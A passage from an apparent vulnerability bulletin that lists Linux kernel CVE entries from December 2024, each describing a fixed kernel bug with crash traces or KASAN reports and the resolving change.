index:0x0 pfn:0x33cfa head:00000000a174ba93 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0 anon flags: 0x4000000000000840(slab|head|zone=1) page_type: 0xffffffff() raw: 4000000000000840 ffff888100848a00 0000000000000000 0000000000000001 raw: 0000000000000000 0000000080190019 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff888033cfaa80: fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc ffff888033cfab00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb >ffff888033cfab80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff888033cfac00: fb fb fb fb fb fc fc fc fc fc fc fc fc fc fc fc ffff888033cfac80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ================================================================== Check if we need to call hci_devcd_complete before calling hci_devcd_append. That requires that we check data->cd_info.cnt >= MTK_COREDUMP_NUM instead of data->cd_info.cnt > MTK_COREDUMP_NUM, as we increment data->cd_info.cnt only once the call to hci_devcd_append succeeds. | 2024-12-27 | not yet calculated | CVE-2024-56653 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_event: Fix using rcu_read_(un)lock while iterating The usage of rcu_read_(un)lock while inside list_for_each_entry_rcu is not safe since for the most part entries fetched this way shall be treated as rcu_dereference: Note that the value returned by rcu_dereference() is valid only within the enclosing RCU read-side critical section [1]_. For example, the following is **not** legal:: rcu_read_lock(); p = rcu_dereference(head.next); rcu_read_unlock(); x = p->address; /* BUG!!! */ rcu_read_lock(); y = p->data; /* BUG!!! */ rcu_read_unlock(); | 2024-12-27 | not yet calculated | CVE-2024-56654 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: do not defer rule destruction via call_rcu nf_tables_chain_destroy can sleep, it can't be used from call_rcu callbacks. Moreover, nf_tables_rule_release() is only safe for error unwinding, while transaction mutex is held and the to-be-desroyed rule was not exposed to either dataplane or dumps, as it deactives+frees without the required synchronize_rcu() in-between. nft_rule_expr_deactivate() callbacks will change ->use counters of other chains/sets, see e.g. nft_lookup .deactivate callback, these must be serialized via transaction mutex. Also add a few lockdep asserts to make this more explicit. Calling synchronize_rcu() isn't ideal, but fixing this without is hard and way more intrusive. As-is, we can get: WARNING: .. net/netfilter/nf_tables_api.c:5515 nft_set_destroy+0x.. Workqueue: events nf_tables_trans_destroy_work RIP: 0010:nft_set_destroy+0x3fe/0x5c0 Call Trace: <TASK> nf_tables_trans_destroy_work+0x6b7/0xad0 process_one_work+0x64a/0xce0 worker_thread+0x613/0x10d0 In case the synchronize_rcu becomes an issue, we can explore alternatives. One way would be to allocate nft_trans_rule objects + one nft_trans_chain object, deactivate the rules + the chain and then defer the freeing to the nft destroy workqueue. We'd still need to keep the synchronize_rcu path as a fallback to handle -ENOMEM corner cases though. | 2024-12-27 | not yet calculated | CVE-2024-56655 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Fix aggregation ID mask to prevent oops on 5760X chips The 5760X (P7) chip's HW GRO/LRO interface is very similar to that of the previous generation (5750X or P5). However, the aggregation ID fields in the completion structures on P7 have been redefined from 16 bits to 12 bits. The freed up 4 bits are redefined for part of the metadata such as the VLAN ID. The aggregation ID mask was not modified when adding support for P7 chips. Including the extra 4 bits for the aggregation ID can potentially cause the driver to store or fetch the packet header of GRO/LRO packets in the wrong TPA buffer. It may hit the BUG() condition in __skb_pull() because the SKB contains no valid packet header: kernel BUG at include/linux/skbuff.h:2766! Oops: invalid opcode: 0000 1 PREEMPT SMP NOPTI CPU: 4 UID: 0 PID: 0 Comm: swapper/4 Kdump: loaded Tainted: G OE 6.12.0-rc2+ #7 Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE Hardware name: Dell Inc. PowerEdge R760/0VRV9X, BIOS 1.0.1 12/27/2022 RIP: 0010:eth_type_trans+0xda/0x140 Code: 80 00 00 00 eb c1 8b 47 70 2b 47 74 48 8b 97 d0 00 00 00 83 f8 01 7e 1b 48 85 d2 74 06 66 83 3a ff 74 09 b8 00 04 00 00 eb a5 <0f> 0b b8 00 01 00 00 eb 9c 48 85 ff 74 eb 31 f6 b9 02 00 00 00 48 RSP: 0018:ff615003803fcc28 EFLAGS: 00010283 RAX: 00000000000022d2 RBX: 0000000000000003 RCX: ff2e8c25da334040 RDX: 0000000000000040 RSI: ff2e8c25c1ce8000 RDI: ff2e8c25869f9000 RBP: ff2e8c258c31c000 R08: ff2e8c25da334000 R09: 0000000000000001 R10: ff2e8c25da3342c0 R11: ff2e8c25c1ce89c0 R12: ff2e8c258e0990b0 R13: ff2e8c25bb120000 R14: ff2e8c25c1ce89c0 R15: ff2e8c25869f9000 FS: 0000000000000000(0000) GS:ff2e8c34be300000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055f05317e4c8 CR3: 000000108bac6006 CR4: 0000000000773ef0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: <IRQ> ? die+0x33/0x90 ? do_trap+0xd9/0x100 ? eth_type_trans+0xda/0x140 ? do_error_trap+0x65/0x80 ? eth_type_trans+0xda/0x140 ? exc_invalid_op+0x4e/0x70 ? eth_type_trans+0xda/0x140 ? asm_exc_invalid_op+0x16/0x20 ? eth_type_trans+0xda/0x140 bnxt_tpa_end+0x10b/0x6b0 [bnxt_en] ? bnxt_tpa_start+0x195/0x320 [bnxt_en] bnxt_rx_pkt+0x902/0xd90 [bnxt_en] ? __bnxt_tx_int.constprop.0+0x89/0x300 [bnxt_en] ? kmem_cache_free+0x343/0x440 ? __bnxt_tx_int.constprop.0+0x24f/0x300 [bnxt_en] __bnxt_poll_work+0x193/0x370 [bnxt_en] bnxt_poll_p5+0x9a/0x300 [bnxt_en] ? try_to_wake_up+0x209/0x670 __napi_poll+0x29/0x1b0 Fix it by redefining the aggregation ID mask for P5_PLUS chips to be 12 bits. This will work because the maximum aggregation ID is less than 4096 on all P5_PLUS chips. | 2024-12-27 | not yet calculated | CVE-2024-56656 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ALSA: control: Avoid WARN() for symlink errors Using WARN() for showing the error of symlink creations don't give more information than telling that something goes wrong, since the usual code path is a lregister callback from each control element creation. More badly, the use of WARN() rather confuses fuzzer as if it were serious issues. This patch downgrades the warning messages to use the normal dev_err() instead of WARN(). For making it clearer, add the function name to the prefix, too. | 2024-12-27 | not yet calculated | CVE-2024-56657 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: defer final 'struct net' free in netns dismantle Ilya reported a slab-use-after-free in dst_destroy [1] Issue is in xfrm6_net_init() and xfrm4_net_init() : They copy xfrm[46]_dst_ops_template into net->xfrm.xfrm[46]_dst_ops. But net structure might be freed before all the dst callbacks are called. So when dst_destroy() calls later : if (dst->ops->destroy) dst->ops->destroy(dst); dst->ops points to the old net->xfrm.xfrm[46]_dst_ops, which has been freed. See a relevant issue fixed in : ac888d58869b ("net: do not delay dst_entries_add() in dst_release()") A fix is to queue the 'struct net' to be freed after one another cleanup_net() round (and existing rcu_barrier()) [1] BUG: KASAN: slab-use-after-free in dst_destroy (net/core/dst.c:112) Read of size 8 at addr ffff8882137ccab0 by task swapper/37/0 Dec 03 05:46:18 kernel: CPU: 37 UID: 0 PID: 0 Comm: swapper/37 Kdump: loaded Not tainted 6.12.0 #67 Hardware name: Red Hat KVM/RHEL, BIOS 1.16.1-1.el9 04/01/2014 Call Trace: <IRQ> dump_stack_lvl (lib/dump_stack.c:124) print_address_description.constprop.0 (mm/kasan/report.c:378) ? dst_destroy (net/core/dst.c:112) print_report (mm/kasan/report.c:489) ? dst_destroy (net/core/dst.c:112) ? kasan_addr_to_slab (mm/kasan/common.c:37) kasan_report (mm/kasan/report.c:603) ? dst_destroy (net/core/dst.c:112) ? rcu_do_batch (kernel/rcu/tree.c:2567) dst_destroy (net/core/dst.c:112) rcu_do_batch (kernel/rcu/tree.c:2567) ? __pfx_rcu_do_batch (kernel/rcu/tree.c:2491) ? lockdep_hardirqs_on_prepare (kernel/locking/lockdep.c:4339 kernel/locking/lockdep.c:4406) rcu_core (kernel/rcu/tree.c:2825) handle_softirqs (kernel/softirq.c:554) __irq_exit_rcu (kernel/softirq.c:589 kernel/softirq.c:428 kernel/softirq.c:637) irq_exit_rcu (kernel/softirq.c:651) sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1049 arch/x86/kernel/apic/apic.c:1049) </IRQ> <TASK> asm_sysvec_apic_timer_interrupt (./arch/x86/include/asm/idtentry.h:702) RIP: 0010:default_idle (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:92 arch/x86/kernel/process.c:743) Code: 00 4d 29 c8 4c 01 c7 4c 29 c2 e9 6e ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 90 0f 00 2d c7 c9 27 00 fb f4 <fa> c3 cc cc cc cc 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 90 RSP: 0018:ffff888100d2fe00 EFLAGS: 00000246 RAX: 00000000001870ed RBX: 1ffff110201a5fc2 RCX: ffffffffb61a3e46 RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffffffb3d4d123 RBP: 0000000000000000 R08: 0000000000000001 R09: ffffed11c7e1835d R10: ffff888e3f0c1aeb R11: 0000000000000000 R12: 0000000000000000 R13: ffff888100d20000 R14: dffffc0000000000 R15: 0000000000000000 ? ct_kernel_exit.constprop.0 (kernel/context_tracking.c:148) ? cpuidle_idle_call (kernel/sched/idle.c:186) default_idle_call (./include/linux/cpuidle.h:143 kernel/sched/idle.c:118) cpuidle_idle_call (kernel/sched/idle.c:186) ? __pfx_cpuidle_idle_call (kernel/sched/idle.c:168) ? lock_release (kernel/locking/lockdep.c:467 kernel/locking/lockdep.c:5848) ? lockdep_hardirqs_on_prepare (kernel/locking/lockdep.c:4347 kernel/locking/lockdep.c:4406) ? tsc_verify_tsc_adjust (arch/x86/kernel/tsc_sync.c:59) do_idle (kernel/sched/idle.c:326) cpu_startup_entry (kernel/sched/idle.c:423 (discriminator 1)) start_secondary (arch/x86/kernel/smpboot.c:202 arch/x86/kernel/smpboot.c:282) ? __pfx_start_secondary (arch/x86/kernel/smpboot.c:232) ? soft_restart_cpu (arch/x86/kernel/head_64.S:452) common_startup_64 (arch/x86/kernel/head_64.S:414) </TASK> Dec 03 05:46:18 kernel: Allocated by task 12184: kasan_save_stack (mm/kasan/common.c:48) kasan_save_track (./arch/x86/include/asm/current.h:49 mm/kasan/common.c:60 mm/kasan/common.c:69) __kasan_slab_alloc (mm/kasan/common.c:319 mm/kasan/common.c:345) kmem_cache_alloc_noprof (mm/slub.c:4085 mm/slub.c:4134 mm/slub.c:4141) copy_net_ns (net/core/net_namespace.c:421 net/core/net_namespace.c:480) create_new_namespaces ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56658 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: lapb: increase LAPB_HEADER_LEN It is unclear if net/lapb code is supposed to be ready for 8021q. We can at least avoid crashes like the following : skbuff: skb_under_panic: text:ffffffff8aabe1f6 len:24 put:20 head:ffff88802824a400 data:ffff88802824a3fe tail:0x16 end:0x140 dev:nr0.2 ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:206 ! Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN PTI CPU: 1 UID: 0 PID: 5508 Comm: dhcpcd Not tainted 6.12.0-rc7-syzkaller-00144-g66418447d27b #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/30/2024 RIP: 0010:skb_panic net/core/skbuff.c:206 [inline] RIP: 0010:skb_under_panic+0x14b/0x150 net/core/skbuff.c:216 Code: 0d 8d 48 c7 c6 2e 9e 29 8e 48 8b 54 24 08 8b 0c 24 44 8b 44 24 04 4d 89 e9 50 41 54 41 57 41 56 e8 1a 6f 37 02 48 83 c4 20 90 <0f> 0b 0f 1f 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 RSP: 0018:ffffc90002ddf638 EFLAGS: 00010282 RAX: 0000000000000086 RBX: dffffc0000000000 RCX: 7a24750e538ff600 RDX: 0000000000000000 RSI: 0000000000000201 RDI: 0000000000000000 RBP: ffff888034a86650 R08: ffffffff8174b13c R09: 1ffff920005bbe60 R10: dffffc0000000000 R11: fffff520005bbe61 R12: 0000000000000140 R13: ffff88802824a400 R14: ffff88802824a3fe R15: 0000000000000016 FS: 00007f2a5990d740(0000) GS:ffff8880b8700000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000110c2631fd CR3: 0000000029504000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> skb_push+0xe5/0x100 net/core/skbuff.c:2636 nr_header+0x36/0x320 net/netrom/nr_dev.c:69 dev_hard_header include/linux/netdevice.h:3148 [inline] vlan_dev_hard_header+0x359/0x480 net/8021q/vlan_dev.c:83 dev_hard_header include/linux/netdevice.h:3148 [inline] lapbeth_data_transmit+0x1f6/0x2a0 drivers/net/wan/lapbether.c:257 lapb_data_transmit+0x91/0xb0 net/lapb/lapb_iface.c:447 lapb_transmit_buffer+0x168/0x1f0 net/lapb/lapb_out.c:149 lapb_establish_data_link+0x84/0xd0 lapb_device_event+0x4e0/0x670 notifier_call_chain+0x19f/0x3e0 kernel/notifier.c:93 __dev_notify_flags+0x207/0x400 dev_change_flags+0xf0/0x1a0 net/core/dev.c:8922 devinet_ioctl+0xa4e/0x1aa0 net/ipv4/devinet.c:1188 inet_ioctl+0x3d7/0x4f0 net/ipv4/af_inet.c:1003 sock_do_ioctl+0x158/0x460 net/socket.c:1227 sock_ioctl+0x626/0x8e0 net/socket.c:1346 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:907 [inline] __se_sys_ioctl+0xf9/0x170 fs/ioctl.c:893 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 | 2024-12-27 | not yet calculated | CVE-2024-56659 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net/mlx5: DR, prevent potential error pointer dereference The dr_domain_add_vport_cap() function generally returns NULL on error but sometimes we want it to return ERR_PTR(-EBUSY) so the caller can retry. The problem here is that "ret" can be either -EBUSY or -ENOMEM and if it's and -ENOMEM then the error pointer is propogated back and eventually dereferenced in dr_ste_v0_build_src_gvmi_qpn_tag(). | 2024-12-27 | not yet calculated | CVE-2024-56660 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: tipc: fix NULL deref in cleanup_bearer() syzbot found [1] that after blamed commit, ub->ubsock->sk was NULL when attempting the atomic_dec() : atomic_dec(&tipc_net(sock_net(ub->ubsock->sk))->wq_count); Fix this by caching the tipc_net pointer. [1] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000006: 0000 [#1] PREEMPT SMP KASAN PTI KASAN: null-ptr-deref in range [0x0000000000000030-0x0000000000000037] CPU: 0 UID: 0 PID: 5896 Comm: kworker/0:3 Not tainted 6.13.0-rc1-next-20241203-syzkaller #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 Workqueue: events cleanup_bearer RIP: 0010:read_pnet include/net/net_namespace.h:387 [inline] RIP: 0010:sock_net include/net/sock.h:655 [inline] RIP: 0010:cleanup_bearer+0x1f7/0x280 net/tipc/udp_media.c:820 Code: 18 48 89 d8 48 c1 e8 03 42 80 3c 28 00 74 08 48 89 df e8 3c f7 99 f6 48 8b 1b 48 83 c3 30 e8 f0 e4 60 00 48 89 d8 48 c1 e8 03 <42> 80 3c 28 00 74 08 48 89 df e8 1a f7 99 f6 49 83 c7 e8 48 8b 1b RSP: 0018:ffffc9000410fb70 EFLAGS: 00010206 RAX: 0000000000000006 RBX: 0000000000000030 RCX: ffff88802fe45a00 RDX: 0000000000000001 RSI: 0000000000000008 RDI: ffffc9000410f900 RBP: ffff88807e1f0908 R08: ffffc9000410f907 R09: 1ffff92000821f20 R10: dffffc0000000000 R11: fffff52000821f21 R12: ffff888031d19980 R13: dffffc0000000000 R14: dffffc0000000000 R15: ffff88807e1f0918 FS: 0000000000000000(0000) GS:ffff8880b8600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000556ca050b000 CR3: 0000000031c0c000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 | 2024-12-27 | not yet calculated | CVE-2024-56661 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: acpi: nfit: vmalloc-out-of-bounds Read in acpi_nfit_ctl Fix an issue detected by syzbot with KASAN: BUG: KASAN: vmalloc-out-of-bounds in cmd_to_func drivers/acpi/nfit/ core.c:416 [inline] BUG: KASAN: vmalloc-out-of-bounds in acpi_nfit_ctl+0x20e8/0x24a0 drivers/acpi/nfit/core.c:459 The issue occurs in cmd_to_func when the call_pkg->nd_reserved2 array is accessed without verifying that call_pkg points to a buffer that is appropriately sized as a struct nd_cmd_pkg. This can lead to out-of-bounds access and undefined behavior if the buffer does not have sufficient space. To address this, a check was added in acpi_nfit_ctl() to ensure that buf is not NULL and that buf_len is less than sizeof(*call_pkg) before accessing it. This ensures safe access to the members of call_pkg, including the nd_reserved2 array. | 2024-12-27 | not yet calculated | CVE-2024-56662 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: nl80211: fix NL80211_ATTR_MLO_LINK_ID off-by-one Since the netlink attribute range validation provides inclusive checking, the *max* of attribute NL80211_ATTR_MLO_LINK_ID should be IEEE80211_MLD_MAX_NUM_LINKS - 1 otherwise causing an off-by-one. One crash stack for demonstration: ================================================================== BUG: KASAN: wild-memory-access in ieee80211_tx_control_port+0x3b6/0xca0 net/mac80211/tx.c:5939 Read of size 6 at addr 001102080000000c by task fuzzer.386/9508 CPU: 1 PID: 9508 Comm: syz.1.386 Not tainted 6.1.70 #2 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x177/0x231 lib/dump_stack.c:106 print_report+0xe0/0x750 mm/kasan/report.c:398 kasan_report+0x139/0x170 mm/kasan/report.c:495 kasan_check_range+0x287/0x290 mm/kasan/generic.c:189 memcpy+0x25/0x60 mm/kasan/shadow.c:65 ieee80211_tx_control_port+0x3b6/0xca0 net/mac80211/tx.c:5939 rdev_tx_control_port net/wireless/rdev-ops.h:761 [inline] nl80211_tx_control_port+0x7b3/0xc40 net/wireless/nl80211.c:15453 genl_family_rcv_msg_doit+0x22e/0x320 net/netlink/genetlink.c:756 genl_family_rcv_msg net/netlink/genetlink.c:833 [inline] genl_rcv_msg+0x539/0x740 net/netlink/genetlink.c:850 netlink_rcv_skb+0x1de/0x420 net/netlink/af_netlink.c:2508 genl_rcv+0x24/0x40 net/netlink/genetlink.c:861 netlink_unicast_kernel net/netlink/af_netlink.c:1326 [inline] netlink_unicast+0x74b/0x8c0 net/netlink/af_netlink.c:1352 netlink_sendmsg+0x882/0xb90 net/netlink/af_netlink.c:1874 sock_sendmsg_nosec net/socket.c:716 [inline] __sock_sendmsg net/socket.c:728 [inline] ____sys_sendmsg+0x5cc/0x8f0 net/socket.c:2499 ___sys_sendmsg+0x21c/0x290 net/socket.c:2553 __sys_sendmsg net/socket.c:2582 [inline] __do_sys_sendmsg net/socket.c:2591 [inline] __se_sys_sendmsg+0x19e/0x270 net/socket.c:2589 do_syscall_x64 arch/x86/entry/common.c:51 [inline] do_syscall_64+0x45/0x90 arch/x86/entry/common.c:81 entry_SYSCALL_64_after_hwframe+0x63/0xcd Update the policy to ensure correct validation. | 2024-12-27 | not yet calculated | CVE-2024-56663 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bpf, sockmap: Fix race between element replace and close() Element replace (with a socket different from the one stored) may race with socket's close() link popping & unlinking. __sock_map_delete() unconditionally unrefs the (wrong) element: // set map[0] = s0 map_update_elem(map, 0, s0) // drop fd of s0 close(s0) sock_map_close() lock_sock(sk) (s0!) sock_map_remove_links(sk) link = sk_psock_link_pop() sock_map_unlink(sk, link) sock_map_delete_from_link // replace map[0] with s1 map_update_elem(map, 0, s1) sock_map_update_elem (s1!) lock_sock(sk) sock_map_update_common psock = sk_psock(sk) spin_lock(&stab->lock) osk = stab->sks[idx] sock_map_add_link(..., &stab->sks[idx]) sock_map_unref(osk, &stab->sks[idx]) psock = sk_psock(osk) sk_psock_put(sk, psock) if (refcount_dec_and_test(&psock)) sk_psock_drop(sk, psock) spin_unlock(&stab->lock) unlock_sock(sk) __sock_map_delete spin_lock(&stab->lock) sk = *psk // s1 replaced s0; sk == s1 if (!sk_test || sk_test == sk) // sk_test (s0) != sk (s1); no branch sk = xchg(psk, NULL) if (sk) sock_map_unref(sk, psk) // unref s1; sks[idx] will dangle psock = sk_psock(sk) sk_psock_put(sk, psock) if (refcount_dec_and_test()) sk_psock_drop(sk, psock) spin_unlock(&stab->lock) release_sock(sk) Then close(map) enqueues bpf_map_free_deferred, which finally calls sock_map_free(). This results in some refcount_t warnings along with a KASAN splat [1]. Fix __sock_map_delete(), do not allow sock_map_unref() on elements that may have been replaced. [1]: BUG: KASAN: slab-use-after-free in sock_map_free+0x10e/0x330 Write of size 4 at addr ffff88811f5b9100 by task kworker/u64:12/1063 CPU: 14 UID: 0 PID: 1063 Comm: kworker/u64:12 Not tainted 6.12.0+ #125 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Arch Linux 1.16.3-1-1 04/01/2014 Workqueue: events_unbound bpf_map_free_deferred Call Trace: <TASK> dump_stack_lvl+0x68/0x90 print_report+0x174/0x4f6 kasan_report+0xb9/0x190 kasan_check_range+0x10f/0x1e0 sock_map_free+0x10e/0x330 bpf_map_free_deferred+0x173/0x320 process_one_work+0x846/0x1420 worker_thread+0x5b3/0xf80 kthread+0x29e/0x360 ret_from_fork+0x2d/0x70 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 1202: kasan_save_stack+0x1e/0x40 kasan_save_track+0x10/0x30 __kasan_slab_alloc+0x85/0x90 kmem_cache_alloc_noprof+0x131/0x450 sk_prot_alloc+0x5b/0x220 sk_alloc+0x2c/0x870 unix_create1+0x88/0x8a0 unix_create+0xc5/0x180 __sock_create+0x241/0x650 __sys_socketpair+0x1ce/0x420 __x64_sys_socketpair+0x92/0x100 do_syscall_64+0x93/0x180 entry_SYSCALL_64_after_hwframe+0x76/0x7e Freed by task 46: kasan_save_stack+0x1e/0x40 kasan_save_track+0x10/0x30 kasan_save_free_info+0x37/0x60 __kasan_slab_free+0x4b/0x70 kmem_cache_free+0x1a1/0x590 __sk_destruct+0x388/0x5a0 sk_psock_destroy+0x73e/0xa50 process_one_work+0x846/0x1420 worker_thread+0x5b3/0xf80 kthread+0x29e/0x360 ret_from_fork+0x2d/0x70 ret_from_fork_asm+0x1a/0x30 The bu ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56664 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bpf,perf: Fix invalid prog_array access in perf_event_detach_bpf_prog Syzbot reported [1] crash that happens for following tracing scenario: - create tracepoint perf event with attr.inherit=1, attach it to the process and set bpf program to it - attached process forks -> chid creates inherited event the new child event shares the parent's bpf program and tp_event (hence prog_array) which is global for tracepoint - exit both process and its child -> release both events - first perf_event_detach_bpf_prog call will release tp_event->prog_array and second perf_event_detach_bpf_prog will crash, because tp_event->prog_array is NULL The fix makes sure the perf_event_detach_bpf_prog checks prog_array is valid before it tries to remove the bpf program from it. [1] https://lore.kernel.org/bpf/Z1MR6dCIKajNS6nU@krava/T/#m91dbf0688221ec7a7fc95e896a7ef9ff93b0b8ad | 2024-12-27 | not yet calculated | CVE-2024-56665 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Dereference null return value In the function pqm_uninit there is a call-assignment of "pdd = kfd_get_process_device_data" which could be null, and this value was later dereferenced without checking. | 2024-12-27 | not yet calculated | CVE-2024-56666 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/i915: Fix NULL pointer dereference in capture_engine When the intel_context structure contains NULL, it raises a NULL pointer dereference error in drm_info(). (cherry picked from commit 754302a5bc1bd8fd3b7d85c168b0a1af6d4bba4d) | 2024-12-27 | not yet calculated | CVE-2024-56667 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Fix qi_batch NULL pointer with nested parent domain The qi_batch is allocated when assigning cache tag for a domain. While for nested parent domain, it is missed. Hence, when trying to map pages to the nested parent, NULL dereference occurred. Also, there is potential memleak since there is no lock around domain->qi_batch allocation. To solve it, add a helper for qi_batch allocation, and call it in both the __cache_tag_assign_domain() and __cache_tag_assign_parent_domain(). BUG: kernel NULL pointer dereference, address: 0000000000000200 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 8104795067 P4D 0 Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 223 UID: 0 PID: 4357 Comm: qemu-system-x86 Not tainted 6.13.0-rc1-00028-g4b50c3c3b998-dirty #2632 Call Trace: ? __die+0x24/0x70 ? page_fault_oops+0x80/0x150 ? do_user_addr_fault+0x63/0x7b0 ? exc_page_fault+0x7c/0x220 ? asm_exc_page_fault+0x26/0x30 ? cache_tag_flush_range_np+0x13c/0x260 intel_iommu_iotlb_sync_map+0x1a/0x30 iommu_map+0x61/0xf0 batch_to_domain+0x188/0x250 iopt_area_fill_domains+0x125/0x320 ? rcu_is_watching+0x11/0x50 iopt_map_pages+0x63/0x100 iopt_map_common.isra.0+0xa7/0x190 iopt_map_user_pages+0x6a/0x80 iommufd_ioas_map+0xcd/0x1d0 iommufd_fops_ioctl+0x118/0x1c0 __x64_sys_ioctl+0x93/0xc0 do_syscall_64+0x71/0x140 entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2024-12-27 | not yet calculated | CVE-2024-56668 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: iommu/vt-d: Remove cache tags before disabling ATS The current implementation removes cache tags after disabling ATS, leading to potential memory leaks and kernel crashes. Specifically, CACHE_TAG_DEVTLB type cache tags may still remain in the list even after the domain is freed, causing a use-after-free condition. This issue really shows up when multiple VFs from different PFs passed through to a single user-space process via vfio-pci. In such cases, the kernel may crash with kernel messages like: BUG: kernel NULL pointer dereference, address: 0000000000000014 PGD 19036a067 P4D 1940a3067 PUD 136c9b067 PMD 0 Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 74 UID: 0 PID: 3183 Comm: testCli Not tainted 6.11.9 #2 RIP: 0010:cache_tag_flush_range+0x9b/0x250 Call Trace: <TASK> ? __die+0x1f/0x60 ? page_fault_oops+0x163/0x590 ? exc_page_fault+0x72/0x190 ? asm_exc_page_fault+0x22/0x30 ? cache_tag_flush_range+0x9b/0x250 ? cache_tag_flush_range+0x5d/0x250 intel_iommu_tlb_sync+0x29/0x40 intel_iommu_unmap_pages+0xfe/0x160 __iommu_unmap+0xd8/0x1a0 vfio_unmap_unpin+0x182/0x340 [vfio_iommu_type1] vfio_remove_dma+0x2a/0xb0 [vfio_iommu_type1] vfio_iommu_type1_ioctl+0xafa/0x18e0 [vfio_iommu_type1] Move cache_tag_unassign_domain() before iommu_disable_pci_caps() to fix it. | 2024-12-27 | not yet calculated | CVE-2024-56669 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: usb: gadget: u_serial: Fix the issue that gs_start_io crashed due to accessing null pointer Considering that in some extreme cases, when u_serial driver is accessed by multiple threads, Thread A is executing the open operation and calling the gs_open, Thread B is executing the disconnect operation and calling the gserial_disconnect function,The port->port_usb pointer will be set to NULL. E.g. Thread A Thread B gs_open() gadget_unbind_driver() gs_start_io() composite_disconnect() gs_start_rx() gserial_disconnect() ... ... spin_unlock(&port->port_lock) status = usb_ep_queue() spin_lock(&port->port_lock) spin_lock(&port->port_lock) port->port_usb = NULL gs_free_requests(port->port_usb->in) spin_unlock(&port->port_lock) Crash This causes thread A to access a null pointer (port->port_usb is null) when calling the gs_free_requests function, causing a crash. If port_usb is NULL, the release request will be skipped as it will be done by gserial_disconnect. So add a null pointer check to gs_start_io before attempting to access the value of the pointer port->port_usb. Call trace: gs_start_io+0x164/0x25c gs_open+0x108/0x13c tty_open+0x314/0x638 chrdev_open+0x1b8/0x258 do_dentry_open+0x2c4/0x700 vfs_open+0x2c/0x3c path_openat+0xa64/0xc60 do_filp_open+0xb8/0x164 do_sys_openat2+0x84/0xf0 __arm64_sys_openat+0x70/0x9c invoke_syscall+0x58/0x114 el0_svc_common+0x80/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x38/0x68 | 2024-12-27 | not yet calculated | CVE-2024-56670 |
| n/a -- n/a |
